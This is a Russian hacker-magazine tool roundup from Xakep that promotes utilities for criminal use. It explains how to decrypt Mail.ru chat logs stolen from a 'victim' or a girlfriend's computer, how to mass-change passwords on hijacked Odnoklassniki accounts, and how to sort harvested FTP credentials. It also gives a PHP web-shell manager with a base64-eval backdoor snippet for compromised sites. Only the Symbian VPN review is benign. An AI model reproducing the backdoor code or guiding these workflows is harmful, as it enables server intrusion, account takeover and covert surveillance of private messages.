Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter Хакер в ВКонтакте Приложение Хакер для Facebook Хакер на Formspring.me
Журнал Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English  
Хакер ищет продавцов рекламы Хакер ищет продавцов рекламы
Xakep.ru приглашает стажеров на должность менеджера по работе с клиентами. Резюме присылать по адресу hr@glc.ru....
Анатомия Cryptolocker Анатомия Cryptolocker
Он прост, как автомат Калашникова, но реально опасен. Ведь это он заставил тысячи незадачливых пользователей платить деньги своим создателям и ухитрился поставить на бабки сотрудников полиции Массачусетса (им пришлось покупать биткоины, чтобы расшифровать свои данные)!...

Хакер № 08/09 (128)

X-Tools

Леонид «R0id» Стройков (r0id@mail.ru)


Mail.ru History Reader

  • ОС: WIndows 2000/XP
  • Автор: Gar|k

Различные IM-клиенты в последнее время расплодились в огромном количестве. Причина - растущая популярность онлайновых систем обмена мгновенными сообщениями. В качестве примера можно привести mail-агент от Mail.ru, набравший немаленькую аудиторию юзеров. Мессенджер получился действительно удобный и функциональный, но с одним недостатком - чужую историю переписки в нем почитать не так-то просто. А ведь иногда доступ к хистори необходим, особенно, если она слита с компа твоей девушки :). Однако решение есть, и имя ему - Mail.ru History Reader. Тулза предназначена для дешифровки логов mail-агента и приведения истории переписки в удобочитаемый вид. Использовать утилу довольно просто:

1. Сливаем интересующие нас логи переписки с компа жертвы, вида: blabla@mail.ruhistory.txt

2. Копируем софтинку с нашего DVD себе на винт и запускаем через консоль

3. Указываем history-файл и файл для сохранения результата:

C:\conv.exe blabla@mail.ruhistory.txt blabla@mail.ru.txt

4. Получаем файлик blabla@mail.ru.txt , в котором и лежит расшифрованная история переписки :)

Тулза работает с логами mail-агента <= 5.3-версии, так что либо всячески агитируй автора - товарища Gar|k'а – на дальнейшее развитие утилы, либо отговаривай свою девушку обновлять mail-агент. Сорцы утилы ты найдешь на нашем диске.

Odnoklassniki.ru Password Changer & Account Checker

  • ОС: WIndows 2000/XP
  • Автор: Zdez Bil Ya

В прошлых выпусках Х-Тулз я публиковал несколько интересных утил, облегчающих всестороннюю работу с популярными социальными сетями. Не будем нарушать традицию и сразу перейдем к описанию полезного софта, который на этот раз предназначен исключительно для ресурса odnoklassniki.ru и включает в себя две утилы: Odnoklassniki.ru Password Changer и Odnoklassniki.ru Account Checker. Как видно из названий, проги позволяют чекать аккаунты и менять на них пароли в автоматическом режиме. Начнем с ченджера пассов aka утилы для массовой смены паролей на акках в «Одноклассниках». Тулза позволяет:

  • менять пароли на аккаунтах на один заданный пасс
  • менять пароли на аккаунтах на генеренные пассы

Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль. В процессе работы утила использует несколько файлов:

  • good_acc.txt - файл, в который помещаются все успешно смененные пары логин;новый_пароль
  • bad_acc.txt - файл, в который помещаются все неудачно смененные пары логин;старый_пароль
  • error_acc.txt - файл, куда помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки

Из возможных причин, по которым аккаунты помещаются в bad_acc.txt, следует выделить:

  • неверный старый пароль
  • не подходит новый пароль (не соответствует правилам в социальной сети)
  • аккаунт заблокирован

Как ты понимаешь, перед запуском ченджера пассов, желательно прочекать список аккаунтов на валид. Для этого мы заюзаем вторую утилу - чекер акков для «Одноклассников»:

  • Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль.
  • В процессе работы утила использует несколько файлов:
    • good_acc.txt - файл, в который помещаются все валидные аккаунты
    • block_acc.txt - файл, в который помещаются все заблокированные аккаунты, доступ к которым закрыт из-за частых попыток логина
    • bad_acc.txt - файл, в который помещаются все невалидные аккаунты
    • error_acc.txt - файл, в который помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки

От себя добавлю, что обе утилы довольно удобны и вполне работоспособны. Причем, каждая из тулз является полноценным win32-приложением, а не PHP/перл-скриптом, как их аналоги. Благодарим автора - Zdez Bil Ya – и сливаем проги с нашего диска :).

Shell manager

  • ОС: *nix/win
  • Автор: Krist_ALL

Ежедневно, ломая тот или иной ресурс, мы пополняем свою коллекцию web-шеллов. Не знаю, как у тебя, но у меня в закладках насчитывается более сотни соответствующих линков, и это далеко не предел :). Возникает вполне логичный вопрос: как сортировать и чекать на валид весь этот архив шеллов? Для этой цели товарищем Krist_ALL'ом была написана небольшая утила под названием «Shell manager», позволяющая парсить веб-шеллы по твоему усмотрению. Тулза представляет собой пхп-скрипт, обладающий такими функциями, как:

  • Проверка веб-шеллов на валидность
  • Чекинг веб-шеллов с последующим определением PR/ТИЦ/Alexa_Rank
  • Возможность ведения заметок по каждому веб-шеллу
  • Массовое выполнение команд (отмечаем веб-шеллы, вводим команду и наблюдаем результат выполнения отдельно для каждого веб-шелла)
  • Добавление веб-шеллов из списка
  • Возможность экспорта результатов
  • Наличие авторизации

Использовать скрипт довольно просто:

1. Запускаем скрипт, указав пароль (по дефолту: password)

2. Создаем необходимую таблицу в БД

3. Редактируем файл скрипта, изменив значение переменной $install на 1 и внеся данные о БД:

//----Настройка БД----------------
$db_host = ''; // Хост
$db_login = ''; // Пароль
$db_password = ''; // Пароль
$db_name = ''; // Имя базы данных
//----Настройка Shell Mananger----
$use_auth = 1; // 1 - Использовать авторизацию, 0 - не использовать
$install = 1; //заменить на 1, после создание таблицы
$password = 'password'; //Изменить на свой.

4. Чтобы добавленный веб-шелл чекался - необходимо в его код добавить пару строк:

if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss =base64_decode($_GET['ev']); eval($sss); exit; }

5. Все, теперь чекер будет успешно взаимодействовать с добавленным веб-шеллом.

FTP Parser

  • ОС: *nix/win
  • Автор: [QwyZ]

При сборе фтп-акков каждый раз встает один и тот же вопрос: как лучше всего их отпарсить? Причем, речь идет не только о проверке валидности, но и о всевозможных сортировках доменов. Итак, представляю тебе утилу под незамысловатым названием «FTP Parser», способную отпарсить список фтп-учеток по самым разнообразным критериям. Тулза представляет собой PHP-скрипт весом в 3Кб и среди ее характеристик:

  • Поиск красивых доменов среди базы фтп-акков (например, blabla.com)
  • Возможность указания максимальной длины домена
  • Возможность поиска определенных слов среди доменных имен
  • Возможность осуществления поиска в субдоменах
  • Функция сохранения результатов сортировки
  • Автоматическая подсветка доменов, аккаунтов и искомых фраз в тексте
  • Возможность соединения с любым фтп-серверов из списка после обработки запроса

Чтобы заюзать скрипт, следует задать ему несколько обязательных параметров, таких как:

  • $z = доменная зона (например, &z=com), если ограничений нет, то * (например, &z=*)
  • $m = максимальная длина домена (например, &m=14), если ограничений нет, то * (например, &m=*)
  • $base = файл с фтп-акками, который располагается в каталоге ./bases (например, &base=file.txt)
  • $all = включить поиск среди субдоменов (например, &all=1,&all=0)
  • $save = включить функцию сохранения результатов запроса (используется каталог ./querie), например, &save=yes,&save=no
  • $word = поиск определенных слов в доменных именах (например, &word=blabla)

То есть, после того, как ты залил скрипт на сервер, а также создал два каталога - ./bases (с фтп-листом внутри) и ./queries, тебе надо перейти по следующему линку:

http://твой_хост/parser.php?z=com&m=14&base=ftps.txt&all=0&save=yes&word=freehostia.com

Как ты уже понял, значения переменных в запросе напрямую зависят от тебя.

SymVPN

Если у тебя есть более-менее функциональный мобильник, то проблема безопасного веб-серфинга тебе знакома. Под различные мобильные платформы соксификаторы не сыщешь днем с огнем, не говоря уже про полноценный VPN. Однако если ты являешься счастливым обладателем девайса на базе Symbian OS 3rd, считай, что тебе повезло. Не так давно для этой ОС появился функциональный VPN-софт под названием SymVPN, поддерживающий протокол PPTP с шифрованием 128-битным ключом MPPE. Найти утилу ты сможешь на портале www.telexy.com, который принадлежит разработчикам всевозможного полезного софта под Symbian OS. Здесь тебе и SymRDP (Symbian Remote Desktop Connection Client), и SymNC (Network Commander) и много чего еще.

Правда, весь софт платный, но для жителей x-USSR действует скидка в 40% (telexy.com/Support/Publications.aspx?codeid=WGSBI6X6KV), что не так уж и плохо. На самом портале ты можешь слить триальную версию утилы и в течение 14 дней оценить все ее преимущества. Ну и после оценки по достоинству, разумеется, купить за какие-то жалкие 820 рублей :).

Для инсталляции потребуется пройти процедуру регистрации и указать все необходимые данные (email, imei твоей трубы). Это обязательно, ибо копия полученной тобой тулзы привязывается к IMEI-номеру телефона. Так или иначе, после получения линка на софт следует перейти к ее настройке, а именно:

  1. 1. Устанавливаем
  2. 2. Ребутим мобилку
  3. 3. Запускаем утилу, указываем параметры соединения, точку доступа (GPRS/Wi-Fi), IP-сервера, логин с паролем и имя точки доступа, которая будет ассоциироваться с VPN-каналом
  4. 4. Выбираем пункт меню «Проверить». Если все в порядке – софтинка выдаст сетевые реквизиты, которые должны быть получены под VPN (IP/маска/шлюз/DNS)
  5. 5. Запускаем стороннюю программу (можно при вырубленном SymVPN) и при запросе точки доступа лицезрим свежесозданную виртуальную точку. Недолго думая, выбираем ее, и весь трафик послушно форварднется на VPN-туннель

На данный момент софтина адаптирована практически под все юзабельные Symbiain-приложения и работает с большинством известных VPN-сервисов. Так что только ленивый не способен скачать, установить и постоянно использовать эту прекрасную утилу.

Содержание  


ВИДЕО К ЭТОМУ НОМЕРУ

Новый оборонительный рубеж
В этом ролике познакомимся с возможностями наиболее популярных HIPS-систем - Safe´n´Sec, DefenseWall и Prevx...

Начальник сети
Диспетчер System Center Configuration Manager 2007 является усовершенствованным вариантом Systems Management Server и призван обеспечивать в динамично изменяющихся средах возможность по управлению и полному контролю над всей IT-инфраструктурой...

Автосплойт своими руками
В правильных руках можно не только получить дедик, но и сразу много дедиков. Очень много! Смотри внимательно, и да откроется тебе черная магия автосплойта!...

Совладай с WPA2
В этом видео мы покажем, насколько просто может быть взломана беспроводная сеть, даже если она защищена WPA...





Предыдущие номера


Предупреждение: Вся информация представлена исключительно в образовательных целях.
Ни авторы, ни редакция не несут ответственности в случае ее использования в противозаконных целях.

    Rambler's Top100